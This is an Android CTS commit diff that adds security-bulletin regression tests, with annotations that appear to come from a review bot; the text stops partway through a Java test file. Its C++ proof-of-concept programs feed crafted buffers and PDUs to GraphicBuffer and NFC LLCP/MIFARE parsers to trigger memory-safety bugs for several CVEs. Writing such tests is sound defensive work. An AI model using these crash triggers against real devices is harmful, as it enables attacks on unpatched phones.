authorAndroid Build Coastguard Worker <android-build-coastguard-worker@google.com>2021-08-18 15:34:30 +0000
committerAndroid Build Coastguard Worker <android-build-coastguard-worker@google.com>2021-08-18 15:34:30 +0000
commitb88e37805715e2e6dba3a3c236d37aecb7a4cca9 (patch)
treef842f3fc19fc8ee05de5e5ee2e97938c4166d695
parent53ae555db9685bd90a2e874e0a4e8240d16696c7 (diff)
parent5060fce4a159b5c1b0867be33e83eb98372762ab (diff)
Snap for 7653618 from 5060fce4a159b5c1b0867be33e83eb98372762ab to sc-mainline-releaseandroid-mainline-12.0.0_r4android-mainline-12.0.0_r36android12--mainline-release
Change-Id: I2681d803a478acf31c9e3bf38b2e964ee820807f
-rw-r--r--apps/CtsVerifier/res/layout-land/sensor_test.xml2
-rw-r--r--apps/CtsVerifier/res/layout-port/sensor_test.xml2
-rw-r--r--apps/CtsVerifier/res/layout-small/sensor_test.xml2
-rw-r--r--apps/CtsVerifier/res/values-small-watch/dimens.xml18
-rw-r--r--apps/CtsVerifier/res/values/dimens.xml2
-rw-r--r--hostsidetests/devicepolicy/src/com/android/cts/devicepolicy/DeviceAndProfileOwnerTest.java4
-rw-r--r--hostsidetests/securitybulletin/securityPatch/CVE-2018-9547/Android.bp31
-rw-r--r--hostsidetests/securitybulletin/securityPatch/CVE-2018-9547/poc.cpp36
-rw-r--r--hostsidetests/securitybulletin/securityPatch/CVE-2018-9564/Android.bp37
-rw-r--r--hostsidetests/securitybulletin/securityPatch/CVE-2018-9564/poc.cpp39
-rw-r--r--hostsidetests/securitybulletin/securityPatch/CVE-2018-9593/Android.bp38
-rw-r--r--hostsidetests/securitybulletin/securityPatch/CVE-2018-9593/poc.cpp41
-rw-r--r--hostsidetests/securitybulletin/securityPatch/CVE-2018-9594/Android.bp38
-rw-r--r--hostsidetests/securitybulletin/securityPatch/CVE-2018-9594/poc.cpp85
-rw-r--r--hostsidetests/securitybulletin/securityPatch/CVE-2020-29368/Android.bp (renamed from hostsidetests/securitybulletin/securityPatch/CVE-2021-29368/Android.bp)2
-rw-r--r--hostsidetests/securitybulletin/securityPatch/CVE-2020-29368/poc.cpp (renamed from hostsidetests/securitybulletin/securityPatch/CVE-2021-29368/poc.cpp)0
-rw-r--r--hostsidetests/securitybulletin/securityPatch/CVE-2021-0596/Android.bp42
-rw-r--r--hostsidetests/securitybulletin/securityPatch/CVE-2021-0596/poc.cpp35
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9547.java36
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9564.java38
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9593.java38
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9594.java38
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_29368.java (renamed from hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_29368.java)6
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0591.java83
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0596.java38
-rw-r--r--hostsidetests/securitybulletin/test-apps/CVE-2021-0591/Android.bp35
-rw-r--r--hostsidetests/securitybulletin/test-apps/CVE-2021-0591/AndroidManifest.xml38
-rw-r--r--hostsidetests/securitybulletin/test-apps/CVE-2021-0591/res/layout/activity_main.xml26
-rw-r--r--hostsidetests/securitybulletin/test-apps/CVE-2021-0591/src/android/security/cts/CVE_2021_0591/DeviceTest.java91
-rw-r--r--hostsidetests/securitybulletin/test-apps/CVE-2021-0591/src/android/security/cts/CVE_2021_0591/PocActivity.java45
-rw-r--r--hostsidetests/statsdatom/src/android/cts/statsdatom/statsd/HostAtomTests.java5
-rw-r--r--tests/location/location_fine/src/android/location/cts/fine/LocationManagerFineTest.java14
-rw-r--r--tests/tests/os/src/android/os/cts/CompanionDeviceManagerTest.kt45
-rw-r--r--tests/tests/provider/preconditions/Android.bp3
-rw-r--r--tests/tests/provider/src/android/provider/cts/media/MediaStoreTest.java1
-rw-r--r--tests/tests/widget/src/android/widget/cts/RadioButtonTest.java6
36 files changed, 1005 insertions, 35 deletions
diff --git a/apps/CtsVerifier/res/layout-land/sensor_test.xml b/apps/CtsVerifier/res/layout-land/sensor_test.xml
index 5dbd95a74fb..9d8f4d68caf 100644
--- a/apps/CtsVerifier/res/layout-land/sensor_test.xml
+++ b/apps/CtsVerifier/res/layout-land/sensor_test.xml
@@ -46,7 +46,7 @@
<android.opengl.GLSurfaceView android:id="@+id/gl_surface_view"
android:visibility="gone"
- android:layout_width="0dp"
+ android:layout_width="@dimen/snsr_glview_size"
android:layout_height="match_parent"
android:layout_weight="1"/>
diff --git a/apps/CtsVerifier/res/layout-port/sensor_test.xml b/apps/CtsVerifier/res/layout-port/sensor_test.xml
index 024a3f388fe..9d00b86fc7b 100644
--- a/apps/CtsVerifier/res/layout-port/sensor_test.xml
+++ b/apps/CtsVerifier/res/layout-port/sensor_test.xml
@@ -37,7 +37,7 @@
<android.opengl.GLSurfaceView android:id="@+id/gl_surface_view"
android:visibility="gone"
- android:layout_height="0dp"
+ android:layout_height="@dimen/snsr_glview_size"
android:layout_weight="1"
android:layout_width="match_parent"/>
diff --git a/apps/CtsVerifier/res/layout-small/sensor_test.xml b/apps/CtsVerifier/res/layout-small/sensor_test.xml
index 348e3219dc3..7f2805eb2e9 100644
--- a/apps/CtsVerifier/res/layout-small/sensor_test.xml
+++ b/apps/CtsVerifier/res/layout-small/sensor_test.xml
@@ -37,7 +37,7 @@
<android.opengl.GLSurfaceView android:id="@+id/gl_surface_view"
android:visibility="gone"
- android:layout_height="0dp"
+ android:layout_height="@dimen/snsr_glview_size"
android:layout_weight="1"
android:layout_width="match_parent"/>
diff --git a/apps/CtsVerifier/res/values-small-watch/dimens.xml b/apps/CtsVerifier/res/values-small-watch/dimens.xml
new file mode 100644
index 00000000000..24e84c5b02c
--- /dev/null
+++ b/apps/CtsVerifier/res/values-small-watch/dimens.xml
@@ -0,0 +1,18 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!-- Copyright (C) 2021 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+-->
+<resources>
+ <dimen name="snsr_glview_size">80dp</dimen>
+</resources>
diff --git a/apps/CtsVerifier/res/values/dimens.xml b/apps/CtsVerifier/res/values/dimens.xml
index faea2b54180..891e740a760 100644
--- a/apps/CtsVerifier/res/values/dimens.xml
+++ b/apps/CtsVerifier/res/values/dimens.xml
@@ -36,6 +36,8 @@
<dimen name="snsr_view_padding_left">8dp</dimen>
<dimen name="snsr_view_padding_right">8dp</dimen>
+ <dimen name="snsr_glview_size">0dp</dimen>
+
<dimen name="js_padding">10dp</dimen>
<!-- Default screen margins, per the Android Design guidelines. -->
diff --git a/hostsidetests/devicepolicy/src/com/android/cts/devicepolicy/DeviceAndProfileOwnerTest.java b/hostsidetests/devicepolicy/src/com/android/cts/devicepolicy/DeviceAndProfileOwnerTest.java
index f69cbaaf04e..fa044aded41 100644
--- a/hostsidetests/devicepolicy/src/com/android/cts/devicepolicy/DeviceAndProfileOwnerTest.java
+++ b/hostsidetests/devicepolicy/src/com/android/cts/devicepolicy/DeviceAndProfileOwnerTest.java
@@ -185,7 +185,7 @@ public abstract class DeviceAndProfileOwnerTest extends BaseDevicePolicyTest {
private static final int PERMISSION_GRANT_STATE_GRANTED = 1;
private static final int PERMISSION_GRANT_STATE_DENIED = 2;
private static final String PARAM_APP_TO_ENABLE = "app_to_enable";
- public static final String RESOLVE_ACTIVITY_CMD = "cmd package resolve-activity --brief %s | tail -n 1";
+ public static final String RESOLVE_ACTIVITY_CMD = "cmd package resolve-activity --brief --user %d %s | tail -n 1";
private static final String NOT_CALLED_FROM_PARENT = "notCalledFromParent";
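Review bot: `RESOLVE_ACTIVITY_CMD` is `public static final`, and the new value puts a `%d` placeholder ahead of the existing `%s`, so any caller outside these hunks that still formats it with only a package name will throw an `IllegalFormatException` at run time instead of failing to compile. Only the call site in the hunk at line 1723 is updated in this commit; other users are not visible here, so they should be checked, or the constant narrowed to `private` if nothing else needs it. A comment on the constant stating the argument order, e.g. `// args: user id (%d), then package name (%s)`, would make the contract explicit. The enclosing class starts and ends outside both hunks.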
@@ -1723,7 +1723,7 @@ public abstract class DeviceAndProfileOwnerTest extends BaseDevicePolicyTest {
final List<String> enabledSystemPackageNames = getEnabledSystemPackageNames();
for (String enabledSystemPackage : enabledSystemPackageNames) {
final String result = getDevice().executeShellCommand(
- String.format(RESOLVE_ACTIVITY_CMD, enabledSystemPackage));
+ String.format(RESOLVE_ACTIVITY_CMD, mUserId, enabledSystemPackage));
if (!result.contains("No activity found")) {
return enabledSystemPackage;
}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2018-9547/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9547/Android.bp
new file mode 100644
index 00000000000..1ca3f7e2a1c
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9547/Android.bp
@@ -0,0 +1,31 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+cc_test {
+ name: "CVE-2018-9547",
+ defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+ srcs: [
+ "poc.cpp",
+ ":cts_hostsidetests_securitybulletin_memutils",
+ ],
+ shared_libs: [
+ "libui",
+ ],
+ cflags: [
+ "-DCHECK_OVERFLOW",
+ ],
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2018-9547/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9547/poc.cpp
new file mode 100644
index 00000000000..7ec82f37f0b
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9547/poc.cpp
@@ -0,0 +1,36 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#include <ui/GraphicBuffer.h>
+#include "../includes/memutils.h"
+
+int main() {
+ size_t size = sizeof(int) * 6;
+ int *tempBuffer = (int *)malloc(size);
+ if (!tempBuffer) {
+ return EXIT_FAILURE;
+ }
+ memset(tempBuffer, 0x0, size);
+ tempBuffer[0] = 'GB01';
+ void const *buffer = const_cast<void const *>((void *)tempBuffer);
+ int const fds[] = {0, 0};
+ size_t count = sizeof(fds) / sizeof(int);
+ int const *fd = const_cast<int const *>(fds);
+ android::GraphicBuffer *graphicBuffer = new android::GraphicBuffer();
+ graphicBuffer->unflatten(buffer, size, fd, count);
+ free(tempBuffer);
+ return EXIT_SUCCESS;
+}
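Review bot: `graphicBuffer` is allocated with a bare `new` and never released, although `tempBuffer` is freed on the line after the call. GraphicBuffer is a reference-counted type in AOSP, so `android::sp<android::GraphicBuffer> graphicBuffer = new android::GraphicBuffer();` gives it a defined lifetime and lets its destructor run before `main` returns. The file also uses `malloc`, `memset` and `EXIT_FAILURE` without including `<stdlib.h>` and `<string.h>` itself, so it appears to compile only through transitive includes. `'GB01'` is a multi-character constant with an implementation-defined value; a one-line comment saying it is the header word `unflatten` expects (if that is the intent) would make the setup readable.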
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2018-9564/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9564/Android.bp
new file mode 100644
index 00000000000..4af3fe41755
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9564/Android.bp
@@ -0,0 +1,37 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+cc_test {
+ name: "CVE-2018-9564",
+ defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+ srcs: [
+ "poc.cpp",
+ ":cts_hostsidetests_securitybulletin_memutils",
+ ],
+ cflags: [
+ "-DCHECK_OVERFLOW",
+ ],
+ compile_multilib: "64",
+ include_dirs: [
+ "system/nfc/src/nfc/include/",
+ "system/nfc/src/include/",
+ "system/nfc/src/gki/ulinux/",
+ ],
+ shared_libs: [
+ "libnfc-nci",
+ ],
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2018-9564/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9564/poc.cpp
new file mode 100644
index 00000000000..f85347599ab
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9564/poc.cpp
@@ -0,0 +1,39 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#include <stdlib.h>
+#include <string.h>
+#include <llcp_api.h>
+
+#define DEFAULT_VALUE 0x02
+#define SIZE 16
+#define LENGTH 1
+
+extern bool llcp_util_parse_link_params(uint16_t length, uint8_t* p_bytes);
+
+int main() {
+ const int32_t offset = SIZE - LENGTH;
+ uint8_t* p_bytes = (uint8_t *)malloc(SIZE);
+ if (!p_bytes) {
+ return EXIT_FAILURE;
+ }
+ memset(p_bytes, DEFAULT_VALUE, SIZE);
+
+ llcp_util_parse_link_params(LENGTH, &p_bytes[offset]);
+
+ free(p_bytes);
+ return EXIT_SUCCESS;
+}
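Review bot: Nothing in `main` says why the parser is handed `&p_bytes[offset]` with `offset = SIZE - LENGTH`, so the test's detection condition has to be reverse-engineered from the constants. A comment above the call such as `// Pass only the final LENGTH byte(s) so any read beyond 'length' leaves the allocation` would document it, together with a remark that the return value is deliberately ignored because the check is crash-based. The local `extern bool llcp_util_parse_link_params(...)` declaration duplicates a library prototype by hand; including the header that declares it, if one is available on the include path configured in Android.bp, would keep the signature from drifting.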
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2018-9593/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9593/Android.bp
new file mode 100644
index 00000000000..68def73f5c6
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9593/Android.bp
@@ -0,0 +1,38 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+cc_test {
+ name: "CVE-2018-9593",
+ defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+ srcs: [
+ "poc.cpp",
+ ":cts_hostsidetests_securitybulletin_memutils",
+ ],
+ cflags: [
+ "-DCHECK_OVERFLOW",
+ ],
+ compile_multilib: "64",
+ include_dirs: [
+ "system/nfc/src/nfc/include/",
+ "system/nfc/src/include/",
+ "system/nfc/src/gki/common/",
+ "system/nfc/src/gki/ulinux/",
+ ],
+ shared_libs: [
+ "libnfc-nci",
+ ],
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2018-9593/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9593/poc.cpp
new file mode 100644
index 00000000000..25b2fb6286f
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9593/poc.cpp
@@ -0,0 +1,41 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#include <stdlib.h>
+#include <string.h>
+#include "llcp_int.h"
+
+#define SIZE 16
+#define LENGTH 1
+
+extern tLLCP_CB llcp_cb;
+void llcp_init(void);
+
+int main() {
+ GKI_init();
+ llcp_init();
+ uint8_t *p_i_pdu = (uint8_t *)malloc(SIZE);
+ if (!p_i_pdu) {
+ return EXIT_FAILURE;
+ }
+
+ llcp_cb.dlcb[0].state = LLCP_DLC_STATE_CONNECTED;
+ llcp_dlc_proc_i_pdu(llcp_cb.dlcb[0].local_sap, llcp_cb.dlcb[0].remote_sap, LENGTH,
+ &p_i_pdu[SIZE - LENGTH], nullptr);
+
+ free(p_i_pdu);
+ return EXIT_SUCCESS;
+}
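Review bot: `p_i_pdu` is passed to `llcp_dlc_proc_i_pdu` without ever being written, so the byte at `p_i_pdu[SIZE - LENGTH]` that the callee receives is indeterminate and the outcome can differ between runs or allocators. `<string.h>` is included but nothing from it is used, which suggests an initialisation was intended; adding `memset(p_i_pdu, 0, SIZE);` after the null check would make the test deterministic, as the CVE-2018-9564 poc in this commit does for its buffer. A short comment on why `nullptr` is acceptable for the last argument would also help, since the callee's handling of it is not visible here.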
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2018-9594/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9594/Android.bp
new file mode 100644
index 00000000000..9d4946f8d22
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9594/Android.bp
@@ -0,0 +1,38 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+cc_test {
+ name: "CVE-2018-9594",
+ defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+ srcs: [
+ "poc.cpp",
+ ":cts_hostsidetests_securitybulletin_memutils",
+ ],
+ cflags: [
+ "-DCHECK_OVERFLOW",
+ ],
+ compile_multilib: "64",
+ include_dirs: [
+ "system/nfc/src/nfc/include/",
+ "system/nfc/src/include/",
+ "system/nfc/src/gki/common/",
+ "system/nfc/src/gki/ulinux/",
+ ],
+ shared_libs: [
+ "libnfc-nci",
+ ],
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2018-9594/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9594/poc.cpp
new file mode 100644
index 00000000000..4a5b163bfbf
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9594/poc.cpp
@@ -0,0 +1,85 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#include <stdlib.h>
+#include <string.h>
+#include <llcp_int.h>
+#include <nfc_int.h>
+
+extern tLLCP_CB llcp_cb;
+extern tNFC_CB nfc_cb;
+void rw_init(void);
+void llcp_init(void);
+
+int main() {
+ GKI_init();
+ rw_init();
+ llcp_init();
+
+ tNFC_CONN *p_data = (tNFC_CONN *)malloc(sizeof(tNFC_CONN));
+ if (!p_data) {
+ return EXIT_FAILURE;
+ }
+ p_data->data.p_data = (NFC_HDR *)malloc(16400 * sizeof(uint8_t));
+ if (!(p_data->data.p_data)) {
+ free(p_data);
+ return EXIT_FAILURE;
+ }
+ nfc_cb.quick_timer_queue.p_first = (TIMER_LIST_ENT *)malloc(16);
+ if (!(nfc_cb.quick_timer_queue.p_first)) {
+ free(p_data);
+ free(p_data->data.p_data);
+ return EXIT_FAILURE;
+ }
+
+ uint8_t conn_id = 1;
+ llcp_cb.lcb.agreed_major_version = LLCP_MIN_SNL_MAJOR_VERSION;
+ llcp_cb.lcb.agreed_minor_version = LLCP_MIN_SNL_MINOR_VERSION;
+ llcp_cb.lcb.link_state = LLCP_LINK_STATE_ACTIVATED;
+ // Set llcp_cb.lcb.local_link_miu greater than p_msg->len
+ llcp_cb.lcb.local_link_miu = 16400;
+ llcp_cb.lcb.received_first_packet = true;
+ llcp_cb.lcb.symm_state = LLCP_LINK_SYMM_REMOTE_XMIT_NEXT;
+ tNFC_CONN_EVT event = NFC_DATA_CEVT;
+
+ NFC_HDR *p_msg = (NFC_HDR *)(p_data->data.p_data);
+ // p_msg->len is calculated based on the total PDUs in AGF PDU
+ p_msg->len = 16395;
+ p_msg->offset = 0;
+ uint8_t *p = (uint8_t *)(p_msg + 1) + p_msg->offset;
+ // First 2 bytes are set to values so that call flow goes from llcp_link_proc_rx_data
+ // to llcp_link_proc_rx_pdu and then to llcp_link_proc_agf_pdu.
+ *p = 0x00;
+ *(p + 1) = 0x80;
+ // The following are trying to emulate PDUs in AGF PDU
+ *(p + 2) = 0x00;
+ *(p + 3) = 0x02;
+ *(p + 4) = 0x02;
+ *(p + 5) = 0x40;
+ *(p + 6) = 0x00;
+ *(p + 7) = 0x01;
+ *(p + 8) = 0x02;
+ *(p + 9) = 0x40;
+ *(p + 10) = 0x00;
+ *(p + 11) = 0x02;
+ *(p + 12) = 0x40;
+
+ llcp_link_connection_cback(conn_id, event, p_data);
+
+ free(p_data);
+ free(nfc_cb.quick_timer_queue.p_first);
+ return EXIT_SUCCESS;
+}
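Review bot: In the failure branch for `nfc_cb.quick_timer_queue.p_first`, `free(p_data);` runs before `free(p_data->data.p_data);`, so the second call reads a pointer out of memory that has just been freed. The two lines should be swapped, `free(p_data->data.p_data);` followed by `free(p_data);`. On the normal path `p_data->data.p_data` is never freed in `main`; unless `llcp_link_connection_cback` takes ownership of it (not visible in this file) that block leaks. The `tNFC_CONN` and the 16-byte block assigned to `p_first` are also used with every field not explicitly set left uninitialised, so zeroing both after allocation would make the run reproducible.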
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2021-29368/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2020-29368/Android.bp
index 7b410b76277..3d54d70dde3 100644
--- a/hostsidetests/securitybulletin/securityPatch/CVE-2021-29368/Android.bp
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2020-29368/Android.bp
@@ -16,7 +16,7 @@
*/
cc_test {
- name: "CVE-2021-29368",
+ name: "CVE-2020-29368",
defaults: ["cts_hostsidetests_securitybulletin_defaults"],
srcs: ["poc.cpp",],
}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2021-29368/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2020-29368/poc.cpp
index 1b3528cd24a..1b3528cd24a 100644
--- a/hostsidetests/securitybulletin/securityPatch/CVE-2021-29368/poc.cpp
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2020-29368/poc.cpp
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2021-0596/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2021-0596/Android.bp
new file mode 100644
index 00000000000..470f2561c51
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2021-0596/Android.bp
@@ -0,0 +1,42 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+cc_test {
+ name: "CVE-2021-0596",
+ defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+ srcs: [
+ "poc.cpp",
+ ":cts_hostsidetests_securitybulletin_memutils",
+ ],
+ compile_multilib: "64",
+ include_dirs: [
+ "packages/apps/Nfc/nci/jni/extns/pn54x/inc",
+ "packages/apps/Nfc/nci/jni/extns/pn54x/src/common",
+ "packages/apps/Nfc/nci/jni/extns/pn54x/src/mifare",
+ "system/nfc/src/gki/common",
+ "system/nfc/src/gki/ulinux",
+ "system/nfc/src/include",
+ "system/nfc/src/nfa/include",
+ "system/nfc/src/nfc/include",
+ ],
+ shared_libs: [
+ "libnfc_nci_jni",
+ ],
+ cflags: [
+ "-DCHECK_UNDERFLOW",
+ ],
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2021-0596/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2021-0596/poc.cpp
new file mode 100644
index 00000000000..9b250044e38
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2021-0596/poc.cpp
@@ -0,0 +1,35 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+#include "phNxpExtns_MifareStd.h"
+
+uint8_t NFC_GetNCIVersion() {
+ return NCI_VERSION_2_0;
+}
+
+int main() {
+ uint8_t *buffer = (uint8_t*) malloc(16 * sizeof(uint8_t));
+ if (buffer == nullptr) {
+ return EXIT_FAILURE;
+ }
+ uint8_t bufferSize = 1;
+ buffer[0] = 0x10;
+ phNxpExtns_MfcModuleInit();
+ Mfc_RecvPacket(buffer, bufferSize);
+ free(buffer);
+ return EXIT_SUCCESS;
+}
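Review bot: The file-scope definition of `NFC_GetNCIVersion()` carries no comment explaining why the test supplies its own, and it reads like dead code since nothing in this file calls it. Presumably it stands in for the NFC stack's function so the code under test sees NCI 2.0; a line such as `// Stub for the NFC stack's NFC_GetNCIVersion(); the test needs NCI 2.0 reported` (wording to be confirmed by the author) would keep it from being removed. `buffer[0] = 0x10` and `bufferSize = 1` are likewise unexplained, and the remaining 15 bytes of the allocation are left uninitialised. `malloc`, `free` and `EXIT_FAILURE` are used without a direct `<stdlib.h>` include.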
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9547.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9547.java
new file mode 100644
index 00000000000..1bb5e0a4679
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9547.java
@@ -0,0 +1,36 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.AsbSecurityTest;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2018_9547 extends SecurityTestCase {
+
+ /**
+ * b/114223584
+ * Vulnerability Behaviour: SIGSEGV in self
+ */
+ @AsbSecurityTest(cveBugId = 114223584)
